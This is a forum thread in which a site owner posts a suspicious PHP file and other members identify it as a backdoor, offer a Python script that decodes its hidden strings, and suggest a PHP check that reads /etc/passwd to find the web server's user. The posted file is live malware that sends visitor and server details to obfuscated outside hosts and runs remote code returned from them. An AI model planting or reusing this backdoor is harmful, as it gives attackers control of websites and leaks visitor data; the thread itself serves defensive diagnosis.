HELP I've been hacked!

wwmmww
Forum Newbie
Posts: 4
Joined: Tue Apr 29, 2008 6:37 pm

Post by wwmmww »

I found this strange file. Does this look suspicious to anyone?? (it does to me!). Thanks to anyone who can advise.

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: HELP I've been hacked!

Post by Mordred »

Yep, a backdoor.
You should be more concerned about how it got there (although at least one of the related hosts appears to be online).
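
A static way to triage a file like the one posted above, without running it: decode the `base64_decode("...")` string literals and flag the remote-include and eval constructs. This is an added example, not code from the thread; the function names are hypothetical and the sample input is constructed with placeholder host names.

```python
import base64
import binascii
import re

# base64_decode("...") or base64_decode('...') called on a string literal.
B64_CALL = re.compile(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')

# Constructs from the posted file that fetch and run code from elsewhere.
INDICATORS = {
    "include of decoded string": re.compile(
        r'\b(?:include|require)(?:_once)?\s*\(?\s*base64_decode\('),
    "eval of fetched content": re.compile(r'\beval\s*\(\s*file_get_contents\('),
    "error reporting silenced": re.compile(r'error_reporting\(\s*0\s*\)'),
}

def decode_literals(source):
    """Decode every base64_decode("literal") argument; the PHP is never run."""
    decoded = []
    for match in B64_CALL.finditer(source):
        try:
            raw = base64.b64decode(match.group(2), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to report
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def triage(source):
    """Return matched indicator names and the decoded string literals."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    return {"indicators": hits, "decoded": decode_literals(source)}

def _b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed sample shaped like the posted file; host names are placeholders.
SAMPLE = (
    '<? error_reporting(0);$str=base64_encode($_SERVER["HTTP_HOST"]);'
    f'if ((include(base64_decode("{_b64("http://")}")'
    f'.base64_decode("{_b64("a.example.invalid")}")."/?".$str)));'
    f'else eval(file_get_contents(base64_decode("{_b64("http://b.example.invalid/?")}")'
    '.$str)); ?>'
)

if __name__ == "__main__":
    report = triage(SAMPLE)
    for name in report["indicators"]:
        print("indicator:", name)
    for value in report["decoded"]:
        print("decoded:  ", value)
```

The decoded strings are the hosts to look for in outbound proxy or firewall logs, and the indicator patterns can be run over the rest of the web root to find other planted copies.
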
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Re: HELP I've been hacked!

Post by Chris Corbyn »

Are you on a shared hosting plan? What host are you with?

Run this script and see if you get a generic username output:

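Code:

<?php

// posix_geteuid() is the UID the PHP process runs as; getmyuid() only
// returns the owner of this script file, so it is used as a fallback.
$uid = function_exists('posix_geteuid') ? posix_geteuid() : getmyuid();
if (is_file('/etc/passwd')) {
  $lines = file('/etc/passwd');
  foreach ($lines as $line) {
    // passwd fields are name:password:UID:GID:...; compare the UID field
    // only, so a matching GID does not give a false hit.
    $data = explode(':', $line);
    if (isset($data[2]) && $data[2] === (string) $uid) {
      printf("Server is using user '%s'", $data[0]);
      break;
    }
  }
} else {
  printf("Unable to determine username");
}
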
That script isn't dangerous. It tries to look up the username of the UID apache is running under. If the server is a Windows server, or a *nix variant which doesn't use /etc/passwd, then it won't work.

If the user is anything like "apache", "http", "nobody", "www" etc. then it's highly probable that all the other users on that server have free and easy access to your files.